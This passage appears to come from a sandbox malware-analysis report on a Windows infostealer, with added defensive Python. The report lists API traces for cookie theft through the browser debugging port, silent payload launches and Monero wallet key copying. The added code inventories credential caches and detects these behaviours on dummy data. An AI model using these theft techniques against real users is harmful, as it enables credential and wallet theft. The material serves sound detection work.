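    """Walk the directories the sample enumerates and return one record per
    regular file. Win32 FindFirstFileA with "*.*" also matches names without an
    extension (.aws\\credentials), so a plain "*" glob is the Python equivalent."""
    found = []
    for env_name, rel in TARGET_DIRS:
        base = roots.get(env_name)
        if base is None or not (base / rel).is_dir():
            continue
        for p in sorted((base / rel).rglob("*")):
            if p.is_file():
                found.append({"kind": rel, "name": p.name, "path": str(p),
                              "bytes": p.stat().st_size, "action": RESPONSE[rel]})
    return found


def roots_from_environment() -> dict[str, Path]:
    """On the host under investigation: the real %USERPROFILE% and %LOCALAPPDATA%."""
    return {k: Path(os.environ[k]) for k in ("USERPROFILE", "LOCALAPPDATA") if k in os.environ}


def demo_roots() -> dict[str, Path]:
    """Constructed tree in a temp dir using the file names the real tools write;
    contents are dummies, not credentials."""
    profile = Path(tempfile.mkdtemp(prefix="profile_"))
    local = Path(tempfile.mkdtemp(prefix="localappdata_"))
    files = [
        profile / ".azure" / "azureProfile.json",
        profile / ".azure" / "msal_token_cache.bin",
        profile / ".aws" / "credentials",
        profile / ".aws" / "sso" / "cache" / "abc.json",
        local / ".IdentityService" / "msal.cache",
    ]
    for f in files:
        f.parent.mkdir(parents=True, exist_ok=True)
        f.write_bytes(b"dummy\n")
    return {"USERPROFILE": profile, "LOCALAPPDATA": local}


if __name__ == "__main__":
    for rec in inventory(demo_roots()):
        print(f'{rec["kind"]:17} {rec["name"]:22} {rec["bytes"]:4d} B  -> {rec["action"]}')
```

Run with `inventory(roots_from_environment())` on the affected machine; every record is a credential or token cache that must be treated as stolen, whether or not the file is DPAPI-protected on disk, because the stealer runs in the same user session that can unprotect it.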
                            APIs
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                            • ShellExecuteEx.SHELL32(0000003C), ref: 00E53415
                            • ShellExecuteEx.SHELL32(0000003C), ref: 00E535AD
                            • ShellExecuteEx.SHELL32(0000003C), ref: 00E5373A
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
• Associated: the same 15 memory dumps (00E40000 through 01571000) listed under the first function above
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExecuteShell$lstrcpy
                            • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                            • API String ID: 2507796910-3625054190
                            • Opcode ID: 80217119d2511722aad65654008fc00967744b40acacdf656971229ccc068f3d
                            • Instruction ID: 8a3187651caa14958b4c43b8585f29d071ef91d3731222003349780e6be4ba99
                            • Opcode Fuzzy Hash: 80217119d2511722aad65654008fc00967744b40acacdf656971229ccc068f3d
                            • Instruction Fuzzy Hash: 8A1221719101189BCB14EBA0DD62FEEB7B9AF14301F045AA9F90676191EF702B4DCFA1
                            APIs
                              • Part of subcall function 00E49A50: InternetOpenA.WININET(00E60AF6,00000001,00000000,00000000,00000000), ref: 00E49A6A
                            • lstrcat.KERNEL32(?,cookies), ref: 00E49CAF
                            • lstrcat.KERNEL32(?,00E612C4), ref: 00E49CC1
                            • lstrcat.KERNEL32(?,?), ref: 00E49CD5
                            • lstrcat.KERNEL32(?,00E612C8), ref: 00E49CE7
                            • lstrcat.KERNEL32(?,?), ref: 00E49CFB
                            • lstrcat.KERNEL32(?,.txt), ref: 00E49D0D
                            • lstrlen.KERNEL32(00000000), ref: 00E49D17
                            • lstrlen.KERNEL32(00000000), ref: 00E49D26
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
• Associated: the same 15 memory dumps (00E40000 through 01571000) listed under the first function above
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrlen$InternetOpenlstrcpy
                            • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                            • API String ID: 3174675846-3542011879
                            • Opcode ID: b9b5ac24a1f37698063c3de1dd65b1ed5ad5c47684c51f1ea3cd0d5820be0b3a
                            • Instruction ID: 5881798d4f947da5c68fa5c6272a9fbdd7c05a8f180dc1a5227625b0e5d280e2
                            • Opcode Fuzzy Hash: b9b5ac24a1f37698063c3de1dd65b1ed5ad5c47684c51f1ea3cd0d5820be0b3a
                            • Instruction Fuzzy Hash: 3F518F71810608ABCB14EBE0EDA5FEEB378AB14301F405598F119B71D5EF70AA89CF61
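The strings `ws://localhost:9229`, `/devtools` and `cookies` above belong to cookie collection over the Chrome DevTools protocol (a WebSocket to the browser's debugging endpoint, from which `Network.getAllCookies` returns cookies already decrypted), and the `C:\Windows\system32\msiexec.exe /i "..." /passive` and `rundll32.exe ... .dll` strings in the ShellExecuteEx function further up are how the sample runs follow-on payloads. Added example covering both, not part of the Joe Sandbox output and not the sample's code: process-creation triage rules run over constructed Sysmon Event ID 1 style records. That the stealer itself starts the browser with `--remote-debugging-port` is the usual way such an endpoint comes to exist; this listing shows only the client side, so that launch, the field names and the sample command lines are assumptions.

```python
"""Added example: process-creation triage for the browser remote-debugging
cookie dump and the msiexec/rundll32 payload launches seen in this report.
Not code from the report; the events below are constructed."""
import re
from pathlib import PureWindowsPath

CHROMIUM_BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe", "opera.exe", "vivaldi.exe", "chromium.exe"}
# Parents from which a silent msiexec install is ordinary; anything else deserves a look.
INSTALLER_PARENTS = {"explorer.exe", "msiexec.exe", "services.exe", "svchost.exe", "setup.exe"}
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\", "\\downloads\\")


def _basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def classify(event: dict) -> list[str]:
    """Return the names of the rules an Event ID 1 style record trips (empty list: none)."""
    image = _basename(event["Image"])
    parent = _basename(event.get("ParentImage", ""))
    cmd = event["CommandLine"].lower()
    hits = []

    # Rule 1: a Chromium browser started with a DevTools endpoint. Over
    # ws://localhost:<port>/devtools/... the Network.getAllCookies method hands
    # out every cookie in the clear, which is what the cookies/.txt strings point to.
    if image in CHROMIUM_BROWSERS and ("--remote-debugging-port" in cmd or "--remote-debugging-pipe" in cmd):
        hits.append("browser_remote_debugging")
        if "--headless" in cmd:
            hits.append("browser_hidden_window")
        if parent not in ("explorer.exe", image):   # the browser's own child processes share the image
            hits.append("browser_spawned_by_non_shell_parent")

    # Rule 2: msiexec /i <package> /passive (or /q, /qn, /qb) from a parent that is neither an installer nor the shell
    if image == "msiexec.exe" and re.search(r"(^|\s)/i(\s|$)", cmd) and re.search(r"\s/(passive|q[nb]?)(\s|$)", cmd):
        if parent not in INSTALLER_PARENTS:
            hits.append("msiexec_silent_install_from_unusual_parent")

    # Rule 3: rundll32 handed a DLL that lives in a user-writable location
    if image == "rundll32.exe":
        m = re.search(r'"?([a-z]:\\[^"]+?\.dll)"?', cmd)
        if m and any(seg in m.group(1) for seg in USER_WRITABLE):
            hits.append("rundll32_dll_from_user_writable_path")
    return hits


# Constructed records (not from the analysed host); stealer path and package names are placeholders.
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ParentImage": r"C:\Users\victim\AppData\Local\Temp\file.exe",
     "CommandLine": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --headless --profile-directory=Default'},
    {"Image": r"C:\Windows\system32\msiexec.exe",
     "ParentImage": r"C:\Users\victim\AppData\Local\Temp\file.exe",
     "CommandLine": r'C:\Windows\system32\msiexec.exe /i "C:\Users\victim\AppData\Local\Temp\pkg.msi" /passive'},
    {"Image": r"C:\Windows\system32\rundll32.exe",
     "ParentImage": r"C:\Users\victim\AppData\Local\Temp\file.exe",
     "CommandLine": r'C:\Windows\system32\rundll32.exe "C:\Users\victim\AppData\Roaming\mod.dll",Start'},
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",      # benign: user-launched browser
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory=Default'},
    {"Image": r"C:\Windows\system32\msiexec.exe",                            # benign: interactive install
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'C:\Windows\system32\msiexec.exe /i "C:\Users\victim\Downloads\tool.msi"'},
]


def triage(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Index and rule hits for every event that trips at least one rule."""
    out = []
    for i, ev in enumerate(events):
        hits = classify(ev)
        if hits:
            out.append((i, hits))
    return out


if __name__ == "__main__":
    for i, hits in triage(SAMPLE_EVENTS):
        print(i, SAMPLE_EVENTS[i]["CommandLine"], hits)
```

Rule 1 is the high-signal one: outside developer and test tooling, a browser with a remote-debugging flag whose parent is not the shell is almost always a cookie dump in progress, and the same process will shortly open a TCP connection to the chosen localhost port. Rules 2 and 3 are heuristics and need an allow-list for legitimate deployment tooling before they go into an alerting pipeline.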
                            APIs
                              • Part of subcall function 00E5AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E5AAF6
                              • Part of subcall function 00E462D0: InternetOpenA.WININET(00E60DFF,00000001,00000000,00000000,00000000), ref: 00E46331
                              • Part of subcall function 00E462D0: StrCmpCA.SHLWAPI(?,009CF3B0), ref: 00E46353
                              • Part of subcall function 00E462D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E46385
                              • Part of subcall function 00E462D0: HttpOpenRequestA.WININET(00000000,GET,?,009CE8D8,00000000,00000000,00400100,00000000), ref: 00E463D5
                              • Part of subcall function 00E462D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00E4640F
                              • Part of subcall function 00E462D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E46421
                              • Part of subcall function 00E5ABB0: lstrcpy.KERNEL32(?,00E60E1A), ref: 00E5AC15
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E55568
                            • lstrlen.KERNEL32(00000000), ref: 00E5557F
                              • Part of subcall function 00E58FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E58FE2
                            • StrStrA.SHLWAPI(00000000,00000000), ref: 00E555B4
                            • lstrlen.KERNEL32(00000000), ref: 00E555D3
                            • lstrlen.KERNEL32(00000000), ref: 00E555FE
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
• Associated: the same 15 memory dumps (00E40000 through 01571000) listed under the first function above
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                            • API String ID: 3240024479-1526165396
                            • Opcode ID: 3ee71a9f91de0aa9cefa1f72b41015798a1ddbee859c1074cf904ce13d92d5e2
                            • Instruction ID: 104bacf0633feb4d2dddc8edb4159842cc0c295b01790cd4feff5e922250dc7b
                            • Opcode Fuzzy Hash: 3ee71a9f91de0aa9cefa1f72b41015798a1ddbee859c1074cf904ce13d92d5e2
                            • Instruction Fuzzy Hash: 96510E305101089BCF58FF60DDA6AED77B9AF14342F546968F80677592EF306B48CBA2
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
• Associated: the same 15 memory dumps (00E40000 through 01571000) listed under the first function above
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: f8d2bc1f74de717b1c0b09631485748c032cec9b081d1283e6872861bff6ea47
                            • Instruction ID: f91b6d92c4f3e8f0a0ce0f75cebad03b07f77ba4f52a196a63d980539b5bebb6
                            • Opcode Fuzzy Hash: f8d2bc1f74de717b1c0b09631485748c032cec9b081d1283e6872861bff6ea47
                            • Instruction Fuzzy Hash: A6C196B59002199BCB18EF60DC99FDE73B9AF54305F0459E8F809B7241DB70AA88CF91
                            APIs
                              • Part of subcall function 00E58F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E58F9B
                            • lstrcat.KERNEL32(?,00000000), ref: 00E5453C
                            • lstrcat.KERNEL32(?,009CEE00), ref: 00E5455B
                            • lstrcat.KERNEL32(?,?), ref: 00E5456F
                            • lstrcat.KERNEL32(?,009CDBC8), ref: 00E54583
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                              • Part of subcall function 00E58F20: GetFileAttributesA.KERNEL32(00000000,?,00E41B94,?,?,00E6577C,?,?,00E60E22), ref: 00E58F2F
                              • Part of subcall function 00E4A430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00E4A489
                              • Part of subcall function 00E4A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E4A13C
                              • Part of subcall function 00E4A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E4A161
                              • Part of subcall function 00E4A110: LocalAlloc.KERNEL32(00000040,?), ref: 00E4A181
                              • Part of subcall function 00E4A110: ReadFile.KERNEL32(000000FF,?,00000000,00E4148F,00000000), ref: 00E4A1AA
                              • Part of subcall function 00E4A110: LocalFree.KERNEL32(00E4148F), ref: 00E4A1E0
                              • Part of subcall function 00E4A110: CloseHandle.KERNEL32(000000FF), ref: 00E4A1EA
                              • Part of subcall function 00E59550: GlobalAlloc.KERNEL32(00000000,-F,00E5462D), ref: 00E59563
                            • StrStrA.SHLWAPI(?,009CED40), ref: 00E54643
                            • GlobalFree.KERNEL32(?), ref: 00E54762
                              • Part of subcall function 00E4A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 00E4A23F
                              • Part of subcall function 00E4A210: LocalAlloc.KERNEL32(00000040,?,?,?,00E44F3E,00000000,?), ref: 00E4A251
                              • Part of subcall function 00E4A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 00E4A27A
                              • Part of subcall function 00E4A210: LocalFree.KERNEL32(?,?,?,?,00E44F3E,00000000,?), ref: 00E4A28F
                            • lstrcat.KERNEL32(?,00000000), ref: 00E546F3
                            • StrCmpCA.SHLWAPI(?,00E608D2), ref: 00E54710
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00E54722
                            • lstrcat.KERNEL32(00000000,?), ref: 00E54735
                            • lstrcat.KERNEL32(00000000,00E60FA0), ref: 00E54744
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                            • String ID:
                            • API String ID: 3541710228-0
                            • Opcode ID: e0864b428aff0390250e600f6262608d7aea06c8d30fa52ca325231059ef0785
                            • Instruction ID: 186a3da68dc109e10e7f0f21d22bc01161e2fd80f4c754d24db55fe372dfcd64
                            • Opcode Fuzzy Hash: e0864b428aff0390250e600f6262608d7aea06c8d30fa52ca325231059ef0785
                            • Instruction Fuzzy Hash: 427188B6900208ABDB14EBB0DD45FDE73BDAB88301F0459A8F515B7185EB74DB88CB51
                            APIs
                              • Part of subcall function 00E412A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E412B4
                              • Part of subcall function 00E412A0: RtlAllocateHeap.NTDLL(00000000), ref: 00E412BB
                              • Part of subcall function 00E412A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00E412D7
                              • Part of subcall function 00E412A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00E412F5
                              • Part of subcall function 00E412A0: RegCloseKey.ADVAPI32(?), ref: 00E412FF
                            • lstrcat.KERNEL32(?,00000000), ref: 00E4134F
                            • lstrlen.KERNEL32(?), ref: 00E4135C
                            • lstrcat.KERNEL32(?,.keys), ref: 00E41377
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                              • Part of subcall function 00E5ACC0: lstrlen.KERNEL32(?,009C99B8,?,\Monero\wallet.keys,00E60E1A), ref: 00E5ACD5
                              • Part of subcall function 00E5ACC0: lstrcpy.KERNEL32(00000000), ref: 00E5AD14
                              • Part of subcall function 00E5ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AD22
                              • Part of subcall function 00E5ABB0: lstrcpy.KERNEL32(?,00E60E1A), ref: 00E5AC15
                              • Part of subcall function 00E58CF0: GetSystemTime.KERNEL32(00E60E1B,009CB1A0,00E605B6,?,?,00E413F9,?,0000001A,00E60E1B,00000000,?,009C99B8,?,\Monero\wallet.keys,00E60E1A), ref: 00E58D16
                              • Part of subcall function 00E5AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E5AC82
                              • Part of subcall function 00E5AC30: lstrcat.KERNEL32(00000000), ref: 00E5AC92
                            • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00E41465
                              • Part of subcall function 00E5AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E5AAF6
                              • Part of subcall function 00E4A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E4A13C
                              • Part of subcall function 00E4A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E4A161
                              • Part of subcall function 00E4A110: LocalAlloc.KERNEL32(00000040,?), ref: 00E4A181
                              • Part of subcall function 00E4A110: ReadFile.KERNEL32(000000FF,?,00000000,00E4148F,00000000), ref: 00E4A1AA
                              • Part of subcall function 00E4A110: LocalFree.KERNEL32(00E4148F), ref: 00E4A1E0
                              • Part of subcall function 00E4A110: CloseHandle.KERNEL32(000000FF), ref: 00E4A1EA
                            • DeleteFileA.KERNEL32(00000000), ref: 00E414EF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                            • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                            • API String ID: 3478931302-218353709
                            • Opcode ID: 366fb456f24b59e6c25bfe5e75fed70538edb8c4d56dc819d5d66b4a5a77605c
                            • Instruction ID: ae146e993af1f7767d9ebcec3576eaf4aaeb0f6a230a06d73678ca07c797c46e
                            • Opcode Fuzzy Hash: 366fb456f24b59e6c25bfe5e75fed70538edb8c4d56dc819d5d66b4a5a77605c
                            • Instruction Fuzzy Hash: DE5154B1D5011857CB54FB60DDA2FEDB37C9B54301F445AE8B60A72082EE706B89CFA6
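The sequence above reads wallet_path from SOFTWARE\monero-project\monero-core (with \Monero\wallet.keys as the fallback string), appends .keys, copies the wallet key file to a temporary name derived from GetSystemTime (CopyFileA with bFailIfExists set), opens and reads the copy, then deletes it. A telemetry source that records hooked API calls per process can catch that copy-read-delete shape on a *.keys source regardless of what the destination is called, and can attach the registry lookup as supporting context. The Python below is an added example, not part of the report: the ApiEvent record layout, the image names, paths and pids in the sample trace are constructed, and the allowlist of legitimate wallet binaries is an assumption to be tuned for the environment.

```python
from __future__ import annotations

from dataclasses import dataclass
from typing import Iterable

# Strings visible in the sample's disassembly.
MONERO_KEY = r"SOFTWARE\monero-project\monero-core"
MONERO_VALUE = "wallet_path"
GENERIC_READ = 0x80000000


@dataclass(frozen=True)
class ApiEvent:
    """One hooked API call. This shape is constructed for the example, not a real
    monitor's record format; map your own source's fields onto it."""
    seq: int
    pid: int
    image: str
    api: str
    args: tuple[str, ...]


@dataclass(frozen=True)
class Alert:
    pid: int
    image: str
    source: str
    copy: str
    queried_monero_registry: bool


def detect_wallet_copy_read_delete(
    events: Iterable[ApiEvent],
    allowed_images: frozenset[str] = frozenset({"monero-wallet-gui.exe", "monero-wallet-cli.exe"}),
) -> list[Alert]:
    """Flag a process that copies a *.keys file, opens the copy with GENERIC_READ
    and then deletes it: CopyFileA -> CreateFileA -> DeleteFileA as listed above.
    The wallet's own binaries (assumed allowlist) are exempt."""
    queried: set[int] = set()
    # (pid, lower-cased copy path) -> (source path, copy was opened for reading)
    pending: dict[tuple[int, str], tuple[str, bool]] = {}
    alerts: list[Alert] = []
    for ev in sorted(events, key=lambda e: e.seq):
        if (ev.api == "RegQueryValueExA" and len(ev.args) >= 2
                and ev.args[0].lower().endswith(MONERO_KEY.lower())
                and ev.args[1].lower() == MONERO_VALUE):
            queried.add(ev.pid)
        elif ev.api == "CopyFileA" and len(ev.args) >= 2 and ev.args[0].lower().endswith(".keys"):
            pending[(ev.pid, ev.args[1].lower())] = (ev.args[0], False)
        elif ev.api == "CreateFileA" and len(ev.args) >= 2:
            key = (ev.pid, ev.args[0].lower())
            if key in pending and int(ev.args[1], 16) & GENERIC_READ:
                pending[key] = (pending[key][0], True)
        elif ev.api == "DeleteFileA" and ev.args:
            entry = pending.pop((ev.pid, ev.args[0].lower()), None)
            if entry and entry[1] and ev.image.lower() not in allowed_images:
                alerts.append(Alert(ev.pid, ev.image, entry[0], ev.args[0], ev.pid in queried))
    return alerts


# Constructed trace: pid 4711 follows the sample's sequence; the other two are benign.
SAMPLE_EVENTS = [
    ApiEvent(1, 4711, "file.exe", "RegOpenKeyExA", (r"HKCU\SOFTWARE\monero-project\monero-core",)),
    ApiEvent(2, 4711, "file.exe", "RegQueryValueExA", (r"HKCU\SOFTWARE\monero-project\monero-core", "wallet_path")),
    ApiEvent(3, 4711, "file.exe", "CopyFileA", (r"C:\Users\alice\Documents\Monero\wallets\main.keys", r"C:\Users\alice\AppData\Local\Temp\17301234", "1")),
    ApiEvent(4, 4711, "file.exe", "CreateFileA", (r"C:\Users\alice\AppData\Local\Temp\17301234", "80000000")),
    ApiEvent(5, 4711, "file.exe", "ReadFile", ("0xFF",)),
    ApiEvent(6, 4711, "file.exe", "DeleteFileA", (r"C:\Users\alice\AppData\Local\Temp\17301234",)),
    # The wallet backing up its own key file, never deleted: no alert.
    ApiEvent(7, 2200, "monero-wallet-gui.exe", "CopyFileA", (r"C:\Users\alice\Documents\Monero\wallets\main.keys", r"C:\Users\alice\Documents\Monero\wallets\main.keys.bak", "0")),
    # Copy/read/delete of a non-wallet file: no alert.
    ApiEvent(8, 3300, "explorer.exe", "CopyFileA", (r"C:\Users\alice\notes.txt", r"C:\Users\alice\AppData\Local\Temp\notes.tmp", "1")),
    ApiEvent(9, 3300, "explorer.exe", "CreateFileA", (r"C:\Users\alice\AppData\Local\Temp\notes.tmp", "80000000")),
    ApiEvent(10, 3300, "explorer.exe", "DeleteFileA", (r"C:\Users\alice\AppData\Local\Temp\notes.tmp",)),
]

if __name__ == "__main__":
    for alert in detect_wallet_copy_read_delete(SAMPLE_EVENTS):
        print(alert)
```

The destination name is deliberately not part of the rule: the sample derives it from the current time, so any fixed pattern on it would be fragile, while the source suffix, the read access on the copy and the delete are inherent to what the routine has to do.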
                            APIs
                            • InternetOpenA.WININET(00E60AF6,00000001,00000000,00000000,00000000), ref: 00E49A6A
                            • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00E49AAB
                            • InternetCloseHandle.WININET(00000000), ref: 00E49AC7
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$Open$CloseHandle
                            • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                            • API String ID: 3289985339-2144369209
                            • Opcode ID: 5338b0fbc0e237bc090c60c05c7ec7f8adb65369e1b4eb68a5a0f9519423cf4e
                            • Instruction ID: 343142b1f7e9bbf6b83e528f3984a68f8a17a703ebb2fa081f65a2b768989498
                            • Opcode Fuzzy Hash: 5338b0fbc0e237bc090c60c05c7ec7f8adb65369e1b4eb68a5a0f9519423cf4e
                            • Instruction Fuzzy Hash: 57414E35A50218ABDB14EF90ED95FDEB7B5EB48780F105198F505B7190CBB0AE84CB64
